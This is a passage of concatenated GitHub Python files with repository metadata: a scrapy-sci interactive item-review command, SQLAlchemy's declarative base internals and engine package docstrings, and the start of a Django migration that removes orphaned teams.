parser.add_option("-r", "--resume", dest="i_no", type="int", default=0,
help="resume review of a file at a given item")
def process_options(self, args, opts):
ScrapyCommand.process_options(self, args, opts)
def run(self, args, opts):
if len(args) < 1:
raise UsageError()
elif len(args) > 1:
raise UsageError("running 'scrapy review' with more than one argument is not supported")
file_name = args[0]
status = Status()
if len(opts.classifiers) == 0: opts.classifiers = status.classifiers.keys() #If all classifiers are to be used
#Setting up classifiers which are possible
valid_classifiers = defaultdict(dict)#Dictionary for currently feasible classifiers only
for classifier_name in status.classifiers.keys():
classifications = []
if status.classifiers[classifier_name]['info']['settings'] and opts.classifiers.count(classifier_name) == 1:
valid_classifiers[classifier_name]['classifications'] = \
sorted(status.classifiers[classifier_name]['classifications'])
#Counting files for valid classifiers
no_files = {}
classifiers = valid_classifiers.keys()
for classifier in valid_classifiers.keys():
reviewed = status.classifiers[classifier]['reviewed']
for classification in list(valid_classifiers[classifier]['classifications']):
no_files[classification] = len([x for x in reviewed if x.find(os.sep + classification) >= 0])
items = Reader.read_unreviewed(file_name)
#Confirmation mode
confirmation_mode = False
conf_input = 3
while conf_input > 2:
try:
conf_input = int(raw_input("1. Keep the same\n2. Turn on confirmation mode"))
except:
print "Wrong input"
if conf_input == 2: confirmation_mode = True
#Review of items
n = opts.i_no
while n < len(items):
print "ITEM {0}/{1}".format(n, len(items))
print no_files
item = items[n]
status.item.review(item)
if n >= opts.i_no:
to_write = {}
for classifier in valid_classifiers.keys():
#Loop to ensure a choice
is_a_choice = False
while is_a_choice == False:
prompt= "Pick classification\n"
choices = {}
i = 0
for classification in valid_classifiers[classifier]['classifications']:
i+=1
choices[i] = classification
prompt+= "{0}. {1}\t".format(i, classification)
if i % 3 == 0: prompt += "\n"
try:
choice = int(raw_input(prompt))
except:
print "Wrong input"
if choices.has_key(choice): is_a_choice = True
to_write[classifier] = choices[choice]
confirmed = True
if confirmation_mode:
confirmed = False
print "Choices: {0}".format("\t".join(to_write[classifier] for classifier in to_write.keys()))
try:
choice = int(raw_input("1. Confirm \n 2. Reclassify"))
except:
print "Wrong input"
if choice == 1: confirmed = True
if confirmed:
for classifier in to_write.keys():
classifications
classifier_dir = os.path.join(status.data_dir, classifier)
no_files[to_write[classifier]]+=1
new_f_name = "{0}0{1}.json".format(to_write[classifier], no_files[to_write[classifier]])
with open(os.path.join(classifier_dir, new_f_name), "wb") as new_f:
new_f.write(json.dumps(item))
item['classifications'] = to_write
with open(os.path.join(status.to_upload_dir, "{0}.json".format(str(uuid.uuid4()))), "wb") as upload_f:
upload_f.write(json.dumps(item))
n+=1
if n == len(items): sys.exit() | {
"content_hash": "e0e04152f923616491fa2ff03499efcd",
"timestamp": "",
"source": "github",
"line_count": 113,
"max_line_length": 122,
"avg_line_length": 46.80530973451327,
"alnum_prop": 0.5354509359047079,
"repo_name": "dangra/scrapy-sci",
"id": "ce71d5152d88cef2c54194589d8f0f01bb381c72",
"size": "5289",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "scrapy_sci/commands/review.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""Internal implementation for declarative."""
from ...schema import Table, Column
from ...orm import mapper, class_mapper, synonym
from ...orm.interfaces import MapperProperty
from ...orm.properties import ColumnProperty, CompositeProperty
from ...orm.attributes import QueryableAttribute
from ...orm.base import _is_mapped_class
from ... import util, exc
from ...util import topological
from ...sql import expression
from ... import event
from . import clsregistry
import collections
import weakref
from sqlalchemy.orm import instrumentation
declared_attr = declarative_props = None
def _declared_mapping_info(cls):
# deferred mapping
if _DeferredMapperConfig.has_cls(cls):
return _DeferredMapperConfig.config_for_cls(cls)
# regular mapping
elif _is_mapped_class(cls):
return class_mapper(cls, configure=False)
else:
return None
def _resolve_for_abstract(cls):
if cls is object:
return None
if _get_immediate_cls_attr(cls, '__abstract__', strict=True):
for sup in cls.__bases__:
sup = _resolve_for_abstract(sup)
if sup is not None:
return sup
else:
return None
else:
return cls
def _get_immediate_cls_attr(cls, attrname, strict=False):
"""return an attribute of the class that is either present directly
on the class, e.g. not on a superclass, or is from a superclass but
this superclass is a mixin, that is, not a descendant of
the declarative base.
This is used to detect attributes that indicate something about
a mapped class independently from any mapped classes that it may
inherit from.
"""
if not issubclass(cls, object):
return None
for base in cls.__mro__:
_is_declarative_inherits = hasattr(base, '_decl_class_registry')
if attrname in base.__dict__ and (
base is cls or
((base in cls.__bases__ if strict else True)
and not _is_declarative_inherits)
):
return getattr(base, attrname)
else:
return None
def _as_declarative(cls, classname, dict_):
global declared_attr, declarative_props
if declared_attr is None:
from .api import declared_attr
declarative_props = (declared_attr, util.classproperty)
if _get_immediate_cls_attr(cls, '__abstract__', strict=True):
return
_MapperConfig.setup_mapping(cls, classname, dict_)
class _MapperConfig(object):
@classmethod
def setup_mapping(cls, cls_, classname, dict_):
defer_map = _get_immediate_cls_attr(
cls_, '_sa_decl_prepare_nocascade', strict=True) or \
hasattr(cls_, '_sa_decl_prepare')
if defer_map:
cfg_cls = _DeferredMapperConfig
else:
cfg_cls = _MapperConfig
cfg_cls(cls_, classname, dict_)
def __init__(self, cls_, classname, dict_):
self.cls = cls_
# dict_ will be a dictproxy, which we can't write to, and we need to!
self.dict_ = dict(dict_)
self.classname = classname
self.mapped_table = None
self.properties = util.OrderedDict()
self.declared_columns = set()
self.column_copies = {}
self._setup_declared_events()
# temporary registry. While early 1.0 versions
# set up the ClassManager here, by API contract
# we can't do that until there's a mapper.
self.cls._sa_declared_attr_reg = {}
self._scan_attributes()
clsregistry.add_class(self.classname, self.cls)
self._extract_mappable_attributes()
self._extract_declared_columns()
self._setup_table()
self._setup_inheritance()
self._early_mapping()
def _early_mapping(self):
self.map()
def _setup_declared_events(self):
if _get_immediate_cls_attr(self.cls, '__declare_last__'):
@event.listens_for(mapper, "after_configured")
def after_configured():
self.cls.__declare_last__()
if _get_immediate_cls_attr(self.cls, '__declare_first__'):
@event.listens_for(mapper, "before_configured")
def before_configured():
self.cls.__declare_first__()
def _scan_attributes(self):
cls = self.cls
dict_ = self.dict_
column_copies = self.column_copies
mapper_args_fn = None
table_args = inherited_table_args = None
tablename = None
for base in cls.__mro__:
class_mapped = base is not cls and \
_declared_mapping_info(base) is not None and \
not _get_immediate_cls_attr(
base, '_sa_decl_prepare_nocascade', strict=True)
if not class_mapped and base is not cls:
self._produce_column_copies(base)
for name, obj in vars(base).items():
if name == '__mapper_args__':
if not mapper_args_fn and (
not class_mapped or
isinstance(obj, declarative_props)
):
# don't even invoke __mapper_args__ until
# after we've determined everything about the
# mapped table.
# make a copy of it so a class-level dictionary
# is not overwritten when we update column-based
# arguments.
mapper_args_fn = lambda: dict(cls.__mapper_args__)
elif name == '__tablename__':
if not tablename and (
not class_mapped or
isinstance(obj, declarative_props)
):
tablename = cls.__tablename__
elif name == '__table_args__':
if not table_args and (
not class_mapped or
isinstance(obj, declarative_props)
):
table_args = cls.__table_args__
if not isinstance(
table_args, (tuple, dict, type(None))):
raise exc.ArgumentError(
"__table_args__ value must be a tuple, "
"dict, or None")
if base is not cls:
inherited_table_args = True
elif class_mapped:
if isinstance(obj, declarative_props):
util.warn("Regular (i.e. not __special__) "
"attribute '%s.%s' uses @declared_attr, "
"but owning class %s is mapped - "
"not applying to subclass %s."
% (base.__name__, name, base, cls))
continue
elif base is not cls:
# we're a mixin, abstract base, or something that is
# acting like that for now.
if isinstance(obj, Column):
# already copied columns to the mapped class.
continue
elif isinstance(obj, MapperProperty):
raise exc.InvalidRequestError(
"Mapper properties (i.e. deferred,"
"column_property(), relationship(), etc.) must "
"be declared as @declared_attr callables "
"on declarative mixin classes.")
elif isinstance(obj, declarative_props):
oldclassprop = isinstance(obj, util.classproperty)
if not oldclassprop and obj._cascading:
dict_[name] = column_copies[obj] = \
ret = obj.__get__(obj, cls)
setattr(cls, name, ret)
else:
if oldclassprop:
util.warn_deprecated(
"Use of sqlalchemy.util.classproperty on "
"declarative classes is deprecated.")
dict_[name] = column_copies[obj] = \
ret = getattr(cls, name)
if isinstance(ret, (Column, MapperProperty)) and \
ret.doc is None:
ret.doc = obj.__doc__
if inherited_table_args and not tablename:
table_args = None
self.table_args = table_args
self.tablename = tablename
self.mapper_args_fn = mapper_args_fn
def _produce_column_copies(self, base):
cls = self.cls
dict_ = self.dict_
column_copies = self.column_copies
# copy mixin columns to the mapped class
for name, obj in vars(base).items():
if isinstance(obj, Column):
if getattr(cls, name) is not obj:
# if column has been overridden
# (like by the InstrumentedAttribute of the
# superclass), skip
continue
elif obj.foreign_keys:
raise exc.InvalidRequestError(
"Columns with foreign keys to other columns "
"must be declared as @declared_attr callables "
"on declarative mixin classes. ")
elif name not in dict_ and not (
'__table__' in dict_ and
(obj.name or name) in dict_['__table__'].c
):
column_copies[obj] = copy_ = obj.copy()
copy_._creation_order = obj._creation_order
setattr(cls, name, copy_)
dict_[name] = copy_
def _extract_mappable_attributes(self):
cls = self.cls
dict_ = self.dict_
our_stuff = self.properties
for k in list(dict_):
if k in ('__table__', '__tablename__', '__mapper_args__'):
continue
value = dict_[k]
if isinstance(value, declarative_props):
value = getattr(cls, k)
elif isinstance(value, QueryableAttribute) and \
value.class_ is not cls and \
value.key != k:
# detect a QueryableAttribute that's already mapped being
# assigned elsewhere in userland, turn into a synonym()
value = synonym(value.key)
setattr(cls, k, value)
if (isinstance(value, tuple) and len(value) == 1 and
isinstance(value[0], (Column, MapperProperty))):
util.warn("Ignoring declarative-like tuple value of attribute "
"%s: possibly a copy-and-paste error with a comma "
"left at the end of the line?" % k)
continue
elif not isinstance(value, (Column, MapperProperty)):
# using @declared_attr for some object that
# isn't Column/MapperProperty; remove from the dict_
# and place the evaluated value onto the class.
if not k.startswith('__'):
dict_.pop(k)
setattr(cls, k, value)
continue
# we expect to see the name 'metadata' in some valid cases;
# however at this point we see it's assigned to something trying
# to be mapped, so raise for that.
elif k == 'metadata':
raise exc.InvalidRequestError(
"Attribute name 'metadata' is reserved "
"for the MetaData instance when using a "
"declarative base class."
)
prop = clsregistry._deferred_relationship(cls, value)
our_stuff[k] = prop
def _extract_declared_columns(self):
our_stuff = self.properties
# set up attributes in the order they were created
our_stuff.sort(key=lambda key: our_stuff[key]._creation_order)
# extract columns from the class dict
declared_columns = self.declared_columns
name_to_prop_key = collections.defaultdict(set)
for key, c in list(our_stuff.items()):
if isinstance(c, (ColumnProperty, CompositeProperty)):
for col in c.columns:
if isinstance(col, Column) and \
col.table is None:
_undefer_column_name(key, col)
if not isinstance(c, CompositeProperty):
name_to_prop_key[col.name].add(key)
declared_columns.add(col)
elif isinstance(c, Column):
_undefer_column_name(key, c)
name_to_prop_key[c.name].add(key)
declared_columns.add(c)
# if the column is the same name as the key,
# remove it from the explicit properties dict.
# the normal rules for assigning column-based properties
# will take over, including precedence of columns
# in multi-column ColumnProperties.
if key == c.key:
del our_stuff[key]
for name, keys in name_to_prop_key.items():
if len(keys) > 1:
util.warn(
"On class %r, Column object %r named "
"directly multiple times, "
"only one will be used: %s" %
(self.classname, name, (", ".join(sorted(keys))))
)
def _setup_table(self):
cls = self.cls
tablename = self.tablename
table_args = self.table_args
dict_ = self.dict_
declared_columns = self.declared_columns
declared_columns = self.declared_columns = sorted(
declared_columns, key=lambda c: c._creation_order)
table = None
if hasattr(cls, '__table_cls__'):
table_cls = util.unbound_method_to_callable(cls.__table_cls__)
else:
table_cls = Table
if '__table__' not in dict_:
if tablename is not None:
args, table_kw = (), {}
if table_args:
if isinstance(table_args, dict):
table_kw = table_args
elif isinstance(table_args, tuple):
if isinstance(table_args[-1], dict):
args, table_kw = table_args[0:-1], table_args[-1]
else:
args = table_args
autoload = dict_.get('__autoload__')
if autoload:
table_kw['autoload'] = True
cls.__table__ = table = table_cls(
tablename, cls.metadata,
*(tuple(declared_columns) + tuple(args)),
**table_kw)
else:
table = cls.__table__
if declared_columns:
for c in declared_columns:
if not table.c.contains_column(c):
raise exc.ArgumentError(
"Can't add additional column %r when "
"specifying __table__" % c.key
)
self.local_table = table
def _setup_inheritance(self):
table = self.local_table
cls = self.cls
table_args = self.table_args
declared_columns = self.declared_columns
for c in cls.__bases__:
c = _resolve_for_abstract(c)
if c is None:
continue
if _declared_mapping_info(c) is not None and \
not _get_immediate_cls_attr(
c, '_sa_decl_prepare_nocascade', strict=True):
self.inherits = c
break
else:
self.inherits = None
if table is None and self.inherits is None and \
not _get_immediate_cls_attr(cls, '__no_table__'):
raise exc.InvalidRequestError(
"Class %r does not have a __table__ or __tablename__ "
"specified and does not inherit from an existing "
"table-mapped class." % cls
)
elif self.inherits:
inherited_mapper = _declared_mapping_info(self.inherits)
inherited_table = inherited_mapper.local_table
inherited_mapped_table = inherited_mapper.mapped_table
if table is None:
# single table inheritance.
# ensure no table args
if table_args:
raise exc.ArgumentError(
"Can't place __table_args__ on an inherited class "
"with no table."
)
# add any columns declared here to the inherited table.
for c in declared_columns:
if c.primary_key:
raise exc.ArgumentError(
"Can't place primary key columns on an inherited "
"class with no table."
)
if c.name in inherited_table.c:
if inherited_table.c[c.name] is c:
continue
raise exc.ArgumentError(
"Column '%s' on class %s conflicts with "
"existing column '%s'" %
(c, cls, inherited_table.c[c.name])
)
inherited_table.append_column(c)
if inherited_mapped_table is not None and \
inherited_mapped_table is not inherited_table:
inherited_mapped_table._refresh_for_new_column(c)
def _prepare_mapper_arguments(self):
properties = self.properties
if self.mapper_args_fn:
mapper_args = self.mapper_args_fn()
else:
mapper_args = {}
# make sure that column copies are used rather
# than the original columns from any mixins
for k in ('version_id_col', 'polymorphic_on',):
if k in mapper_args:
v = mapper_args[k]
mapper_args[k] = self.column_copies.get(v, v)
assert 'inherits' not in mapper_args, \
"Can't specify 'inherits' explicitly with declarative mappings"
if self.inherits:
mapper_args['inherits'] = self.inherits
if self.inherits and not mapper_args.get('concrete', False):
# single or joined inheritance
# exclude any cols on the inherited table which are
# not mapped on the parent class, to avoid
# mapping columns specific to sibling/nephew classes
inherited_mapper = _declared_mapping_info(self.inherits)
inherited_table = inherited_mapper.local_table
if 'exclude_properties' not in mapper_args:
mapper_args['exclude_properties'] = exclude_properties = \
set([c.key for c in inherited_table.c
if c not in inherited_mapper._columntoproperty])
exclude_properties.difference_update(
[c.key for c in self.declared_columns])
# look through columns in the current mapper that
# are keyed to a propname different than the colname
# (if names were the same, we'd have popped it out above,
# in which case the mapper makes this combination).
# See if the superclass has a similar column property.
# If so, join them together.
for k, col in list(properties.items()):
if not isinstance(col, expression.ColumnElement):
continue
if k in inherited_mapper._props:
p = inherited_mapper._props[k]
if isinstance(p, ColumnProperty):
# note here we place the subclass column
# first. See [ticket:1892] for background.
properties[k] = [col] + p.columns
result_mapper_args = mapper_args.copy()
result_mapper_args['properties'] = properties
self.mapper_args = result_mapper_args
def map(self):
self._prepare_mapper_arguments()
if hasattr(self.cls, '__mapper_cls__'):
mapper_cls = util.unbound_method_to_callable(
self.cls.__mapper_cls__)
else:
mapper_cls = mapper
self.cls.__mapper__ = mp_ = mapper_cls(
self.cls,
self.local_table,
**self.mapper_args
)
del self.cls._sa_declared_attr_reg
return mp_
class _DeferredMapperConfig(_MapperConfig):
_configs = util.OrderedDict()
def _early_mapping(self):
pass
@property
def cls(self):
return self._cls()
@cls.setter
def cls(self, class_):
self._cls = weakref.ref(class_, self._remove_config_cls)
self._configs[self._cls] = self
@classmethod
def _remove_config_cls(cls, ref):
cls._configs.pop(ref, None)
@classmethod
def has_cls(cls, class_):
# 2.6 fails on weakref if class_ is an old style class
return isinstance(class_, type) and \
weakref.ref(class_) in cls._configs
@classmethod
def config_for_cls(cls, class_):
return cls._configs[weakref.ref(class_)]
@classmethod
def classes_for_base(cls, base_cls, sort=True):
classes_for_base = [m for m in cls._configs.values()
if issubclass(m.cls, base_cls)]
if not sort:
return classes_for_base
all_m_by_cls = dict(
(m.cls, m)
for m in classes_for_base
)
tuples = []
for m_cls in all_m_by_cls:
tuples.extend(
(all_m_by_cls[base_cls], all_m_by_cls[m_cls])
for base_cls in m_cls.__bases__
if base_cls in all_m_by_cls
)
return list(
topological.sort(
tuples,
classes_for_base
)
)
def map(self):
self._configs.pop(self._cls, None)
return super(_DeferredMapperConfig, self).map()
def _add_attribute(cls, key, value):
"""add an attribute to an existing declarative class.
This runs through the logic to determine MapperProperty,
adds it to the Mapper, adds a column to the mapped Table, etc.
"""
if '__mapper__' in cls.__dict__:
if isinstance(value, Column):
_undefer_column_name(key, value)
cls.__table__.append_column(value)
cls.__mapper__.add_property(key, value)
elif isinstance(value, ColumnProperty):
for col in value.columns:
if isinstance(col, Column) and col.table is None:
_undefer_column_name(key, col)
cls.__table__.append_column(col)
cls.__mapper__.add_property(key, value)
elif isinstance(value, MapperProperty):
cls.__mapper__.add_property(
key,
clsregistry._deferred_relationship(cls, value)
)
elif isinstance(value, QueryableAttribute) and value.key != key:
# detect a QueryableAttribute that's already mapped being
# assigned elsewhere in userland, turn into a synonym()
value = synonym(value.key)
cls.__mapper__.add_property(
key,
clsregistry._deferred_relationship(cls, value)
)
else:
type.__setattr__(cls, key, value)
else:
type.__setattr__(cls, key, value)
def _declarative_constructor(self, **kwargs):
"""A simple constructor that allows initialization from kwargs.
Sets attributes on the constructed instance using the names and
values in ``kwargs``.
Only keys that are present as
attributes of the instance's class are allowed. These could be,
for example, any mapped columns or relationships.
"""
cls_ = type(self)
for k in kwargs:
if not hasattr(cls_, k):
raise TypeError(
"%r is an invalid keyword argument for %s" %
(k, cls_.__name__))
setattr(self, k, kwargs[k])
_declarative_constructor.__name__ = '__init__'
def _undefer_column_name(key, column):
if column.key is None:
column.key = key
if column.name is None:
column.name = key
| {
"content_hash": "f375da1d4ef5765bb2bc41c1287f6051",
"timestamp": "",
"source": "github",
"line_count": 651,
"max_line_length": 79,
"avg_line_length": 38.384024577572966,
"alnum_prop": 0.5178885865215304,
"repo_name": "jburger424/MediaQueueHCI",
"id": "59ebe3722a570b96504c6d55b580615164520389",
"size": "25231",
"binary": false,
"copies": "20",
"ref": "refs/heads/dev",
"path": "m-q-env/lib/python3.4/site-packages/sqlalchemy/ext/declarative/base.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "5939"
},
{
"name": "CSS",
"bytes": "28174"
},
{
"name": "HTML",
"bytes": "28708"
},
{
"name": "JavaScript",
"bytes": "125536"
},
{
"name": "Python",
"bytes": "7754137"
},
{
"name": "Shell",
"bytes": "3720"
}
],
"symlink_target": ""
} |
"""SQL connections, SQL execution and high-level DB-API interface.
The engine package defines the basic components used to interface
DB-API modules with higher-level statement construction,
connection-management, execution and result contexts. The primary
"entry point" class into this package is the Engine and it's public
constructor ``create_engine()``.
This package includes:
base.py
Defines interface classes and some implementation classes which
comprise the basic components used to interface between a DB-API,
constructed and plain-text statements, connections, transactions,
and results.
default.py
Contains default implementations of some of the components defined
in base.py. All current database dialects use the classes in
default.py as base classes for their own database-specific
implementations.
strategies.py
The mechanics of constructing ``Engine`` objects are represented
here. Defines the ``EngineStrategy`` class which represents how
to go from arguments specified to the ``create_engine()``
function, to a fully constructed ``Engine``, including
initialization of connection pooling, dialects, and specific
subclasses of ``Engine``.
threadlocal.py
The ``TLEngine`` class is defined here, which is a subclass of
the generic ``Engine`` and tracks ``Connection`` and
``Transaction`` objects against the identity of the current
thread. This allows certain programming patterns based around
the concept of a "thread-local connection" to be possible.
The ``TLEngine`` is created by using the "threadlocal" engine
strategy in conjunction with the ``create_engine()`` function.
url.py
Defines the ``URL`` class which represents the individual
components of a string URL passed to ``create_engine()``. Also
defines a basic module-loading strategy for the dialect specifier
within a URL.
"""
from .interfaces import (
Connectable,
Dialect,
ExecutionContext,
# backwards compat
Compiled,
TypeCompiler
)
from .base import (
Connection,
Engine,
NestedTransaction,
RootTransaction,
Transaction,
TwoPhaseTransaction,
)
from .result import (
BufferedColumnResultProxy,
BufferedColumnRow,
BufferedRowResultProxy,
FullyBufferedResultProxy,
ResultProxy,
RowProxy,
)
from .util import (
connection_memoize
)
from . import util, strategies
# backwards compat
from ..sql import ddl
default_strategy = 'plain'
def create_engine(*args, **kwargs):
"""Create a new :class:`.Engine` instance.
The standard calling form is to send the URL as the
first positional argument, usually a string
that indicates database dialect and connection arguments::
engine = create_engine("postgresql://scott:tiger@localhost/test")
Additional keyword arguments may then follow it which
establish various options on the resulting :class:`.Engine`
and its underlying :class:`.Dialect` and :class:`.Pool`
constructs::
engine = create_engine("mysql://scott:tiger@hostname/dbname",
encoding='latin1', echo=True)
The string form of the URL is
``dialect[+driver]://user:password@host/dbname[?key=value..]``, where
``dialect`` is a database name such as ``mysql``, ``oracle``,
``postgresql``, etc., and ``driver`` the name of a DBAPI, such as
``psycopg2``, ``pyodbc``, ``cx_oracle``, etc. Alternatively,
the URL can be an instance of :class:`~sqlalchemy.engine.url.URL`.
``**kwargs`` takes a wide variety of options which are routed
towards their appropriate components. Arguments may be specific to
the :class:`.Engine`, the underlying :class:`.Dialect`, as well as the
:class:`.Pool`. Specific dialects also accept keyword arguments that
are unique to that dialect. Here, we describe the parameters
that are common to most :func:`.create_engine()` usage.
Once established, the newly resulting :class:`.Engine` will
request a connection from the underlying :class:`.Pool` once
:meth:`.Engine.connect` is called, or a method which depends on it
such as :meth:`.Engine.execute` is invoked. The :class:`.Pool` in turn
will establish the first actual DBAPI connection when this request
is received. The :func:`.create_engine` call itself does **not**
establish any actual DBAPI connections directly.
.. seealso::
:doc:`/core/engines`
:doc:`/dialects/index`
:ref:`connections_toplevel`
:param case_sensitive=True: if False, result column names
will match in a case-insensitive fashion, that is,
``row['SomeColumn']``.
.. versionchanged:: 0.8
By default, result row names match case-sensitively.
In version 0.7 and prior, all matches were case-insensitive.
:param connect_args: a dictionary of options which will be
passed directly to the DBAPI's ``connect()`` method as
additional keyword arguments. See the example
at :ref:`custom_dbapi_args`.
:param convert_unicode=False: if set to True, sets
the default behavior of ``convert_unicode`` on the
:class:`.String` type to ``True``, regardless
of a setting of ``False`` on an individual
:class:`.String` type, thus causing all :class:`.String`
-based columns
to accommodate Python ``unicode`` objects. This flag
is useful as an engine-wide setting when using a
DBAPI that does not natively support Python
``unicode`` objects and raises an error when
one is received (such as pyodbc with FreeTDS).
See :class:`.String` for further details on
what this flag indicates.
:param creator: a callable which returns a DBAPI connection.
This creation function will be passed to the underlying
connection pool and will be used to create all new database
connections. Usage of this function causes connection
parameters specified in the URL argument to be bypassed.
:param echo=False: if True, the Engine will log all statements
as well as a repr() of their parameter lists to the engines
logger, which defaults to sys.stdout. The ``echo`` attribute of
``Engine`` can be modified at any time to turn logging on and
off. If set to the string ``"debug"``, result rows will be
printed to the standard output as well. This flag ultimately
controls a Python logger; see :ref:`dbengine_logging` for
information on how to configure logging directly.
:param echo_pool=False: if True, the connection pool will log
all checkouts/checkins to the logging stream, which defaults to
sys.stdout. This flag ultimately controls a Python logger; see
:ref:`dbengine_logging` for information on how to configure logging
directly.
:param encoding: Defaults to ``utf-8``. This is the string
encoding used by SQLAlchemy for string encode/decode
operations which occur within SQLAlchemy, **outside of
the DBAPI.** Most modern DBAPIs feature some degree of
direct support for Python ``unicode`` objects,
what you see in Python 2 as a string of the form
``u'some string'``. For those scenarios where the
DBAPI is detected as not supporting a Python ``unicode``
object, this encoding is used to determine the
source/destination encoding. It is **not used**
for those cases where the DBAPI handles unicode
directly.
To properly configure a system to accommodate Python
``unicode`` objects, the DBAPI should be
configured to handle unicode to the greatest
degree as is appropriate - see
the notes on unicode pertaining to the specific
target database in use at :ref:`dialect_toplevel`.
Areas where string encoding may need to be accommodated
outside of the DBAPI include zero or more of:
* the values passed to bound parameters, corresponding to
the :class:`.Unicode` type or the :class:`.String` type
when ``convert_unicode`` is ``True``;
* the values returned in result set columns corresponding
to the :class:`.Unicode` type or the :class:`.String`
type when ``convert_unicode`` is ``True``;
* the string SQL statement passed to the DBAPI's
``cursor.execute()`` method;
* the string names of the keys in the bound parameter
dictionary passed to the DBAPI's ``cursor.execute()``
as well as ``cursor.setinputsizes()`` methods;
* the string column names retrieved from the DBAPI's
``cursor.description`` attribute.
When using Python 3, the DBAPI is required to support
*all* of the above values as Python ``unicode`` objects,
which in Python 3 are just known as ``str``. In Python 2,
the DBAPI does not specify unicode behavior at all,
so SQLAlchemy must make decisions for each of the above
values on a per-DBAPI basis - implementations are
completely inconsistent in their behavior.
:param execution_options: Dictionary execution options which will
be applied to all connections. See
:meth:`~sqlalchemy.engine.Connection.execution_options`
:param implicit_returning=True: When ``True``, a RETURNING-
compatible construct, if available, will be used to
fetch newly generated primary key values when a single row
INSERT statement is emitted with no existing returning()
clause. This applies to those backends which support RETURNING
or a compatible construct, including Postgresql, Firebird, Oracle,
Microsoft SQL Server. Set this to ``False`` to disable
the automatic usage of RETURNING.
:param label_length=None: optional integer value which limits
the size of dynamically generated column labels to that many
characters. If less than 6, labels are generated as
"_(counter)". If ``None``, the value of
``dialect.max_identifier_length`` is used instead.
:param listeners: A list of one or more
:class:`~sqlalchemy.interfaces.PoolListener` objects which will
receive connection pool events.
:param logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.engine" logger. Defaults to a hexstring of the
object's id.
:param max_overflow=10: the number of connections to allow in
connection pool "overflow", that is connections that can be
opened above and beyond the pool_size setting, which defaults
to five. this is only used with :class:`~sqlalchemy.pool.QueuePool`.
:param module=None: reference to a Python module object (the module
itself, not its string name). Specifies an alternate DBAPI module to
be used by the engine's dialect. Each sub-dialect references a
specific DBAPI which will be imported before first connect. This
parameter causes the import to be bypassed, and the given module to
be used instead. Can be used for testing of DBAPIs as well as to
inject "mock" DBAPI implementations into the :class:`.Engine`.
:param pool=None: an already-constructed instance of
:class:`~sqlalchemy.pool.Pool`, such as a
:class:`~sqlalchemy.pool.QueuePool` instance. If non-None, this
pool will be used directly as the underlying connection pool
for the engine, bypassing whatever connection parameters are
present in the URL argument. For information on constructing
connection pools manually, see :ref:`pooling_toplevel`.
:param poolclass=None: a :class:`~sqlalchemy.pool.Pool`
subclass, which will be used to create a connection pool
instance using the connection parameters given in the URL. Note
this differs from ``pool`` in that you don't actually
instantiate the pool in this case, you just indicate what type
of pool to be used.
:param pool_logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.pool" logger. Defaults to a hexstring of the object's
id.
:param pool_size=5: the number of connections to keep open
inside the connection pool. This used with
:class:`~sqlalchemy.pool.QueuePool` as
well as :class:`~sqlalchemy.pool.SingletonThreadPool`. With
:class:`~sqlalchemy.pool.QueuePool`, a ``pool_size`` setting
of 0 indicates no limit; to disable pooling, set ``poolclass`` to
:class:`~sqlalchemy.pool.NullPool` instead.
:param pool_recycle=-1: this setting causes the pool to recycle
connections after the given number of seconds has passed. It
defaults to -1, or no timeout. For example, setting to 3600
means connections will be recycled after one hour. Note that
MySQL in particular will disconnect automatically if no
activity is detected on a connection for eight hours (although
this is configurable with the MySQLDB connection itself and the
server configuration as well).
:param pool_reset_on_return='rollback': set the "reset on return"
behavior of the pool, which is whether ``rollback()``,
``commit()``, or nothing is called upon connections
being returned to the pool. See the docstring for
``reset_on_return`` at :class:`.Pool`.
.. versionadded:: 0.7.6
:param pool_timeout=30: number of seconds to wait before giving
up on getting a connection from the pool. This is only used
with :class:`~sqlalchemy.pool.QueuePool`.
:param strategy='plain': selects alternate engine implementations.
Currently available are:
* the ``threadlocal`` strategy, which is described in
:ref:`threadlocal_strategy`;
* the ``mock`` strategy, which dispatches all statement
execution to a function passed as the argument ``executor``.
See `example in the FAQ
<http://www.sqlalchemy.org/trac/wiki/FAQ#HowcanIgettheCREATETABLEDROPTABLEoutputasastring>`_.
:param executor=None: a function taking arguments
``(sql, *multiparams, **params)``, to which the ``mock`` strategy will
dispatch all statement execution. Used only by ``strategy='mock'``.
"""
strategy = kwargs.pop('strategy', default_strategy)
strategy = strategies.strategies[strategy]
return strategy.create(*args, **kwargs)
def engine_from_config(configuration, prefix='sqlalchemy.', **kwargs):
"""Create a new Engine instance using a configuration dictionary.
The dictionary is typically produced from a config file where keys
are prefixed, such as sqlalchemy.url, sqlalchemy.echo, etc. The
'prefix' argument indicates the prefix to be searched for.
A select set of keyword arguments will be "coerced" to their
expected type based on string values. In a future release, this
functionality will be expanded and include dialect-specific
arguments.
"""
options = dict((key[len(prefix):], configuration[key])
for key in configuration
if key.startswith(prefix))
options['_coerce_config'] = True
options.update(kwargs)
url = options.pop('url')
return create_engine(url, **options)
__all__ = (
'create_engine',
'engine_from_config',
)
| {
"content_hash": "9b896b61a41721345281c45ff0e8df93",
"timestamp": "",
"source": "github",
"line_count": 366,
"max_line_length": 103,
"avg_line_length": 42.83879781420765,
"alnum_prop": 0.6869698322597104,
"repo_name": "jessekl/flixr",
"id": "99251f63039bd6328313f2ff943cd0a20d0c4503",
"size": "15916",
"binary": false,
"copies": "78",
"ref": "refs/heads/master",
"path": "venv/lib/python2.7/site-packages/sqlalchemy/engine/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "44245"
},
{
"name": "CSS",
"bytes": "22772"
},
{
"name": "Groff",
"bytes": "73"
},
{
"name": "HTML",
"bytes": "25882"
},
{
"name": "JavaScript",
"bytes": "7403"
},
{
"name": "Mako",
"bytes": "7564"
},
{
"name": "Python",
"bytes": "14303733"
},
{
"name": "Shell",
"bytes": "3763"
},
{
"name": "XSLT",
"bytes": "152770"
}
],
"symlink_target": ""
} |
import logging
from django.utils.encoding import smart_text
logger = logging.getLogger('rbac_migrations')
def migrate_team(apps, schema_editor):
'''If an orphan team exists that is still active, delete it.'''
Team = apps.get_model('main', 'Team')
for team in Team.objects.iterator():
if team.organization is None:
logger.info(smart_text(u"Deleting orphaned team: {}".format(team.name)))
team.delete()
| {
